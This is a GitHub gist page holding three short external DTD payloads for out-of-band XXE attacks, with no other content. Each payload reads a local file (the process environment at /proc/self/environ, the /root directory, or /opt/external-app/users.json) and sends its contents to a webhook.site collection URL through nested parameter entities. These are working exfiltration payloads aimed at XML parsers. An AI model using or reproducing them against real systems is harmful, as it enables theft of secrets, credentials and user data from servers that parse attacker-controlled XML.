Created
May 15, 2026 21:54
-
-
Save Diniboy1123/b0d6c5a2f3015f7cf1919657b6ba61d8 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!ENTITY % file SYSTEM "file:///proc/self/environ"> | |
| <!ENTITY % exfil "<!ENTITY % send SYSTEM 'http://webhook.site/052df2a3-3f60-43a7-b847-caa2512e56b9/?d=%file;'>"> | |
| %exfil; | |
| %send; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!ENTITY % file SYSTEM "file:///root/"> | |
| <!ENTITY % exfil "<!ENTITY % send SYSTEM 'http://webhook.site/052df2a3-3f60-43a7-b847-caa2512e56b9/?d=%file;'>"> | |
| %exfil; | |
| %send; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!ENTITY % file SYSTEM "file:///opt/external-app/users.json"> | |
| <!ENTITY % exfil "<!ENTITY % send SYSTEM 'http://webhook.site/052df2a3-3f60-43a7-b847-caa2512e56b9/?d=%file;'>"> | |
| %exfil; | |
| %send; |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment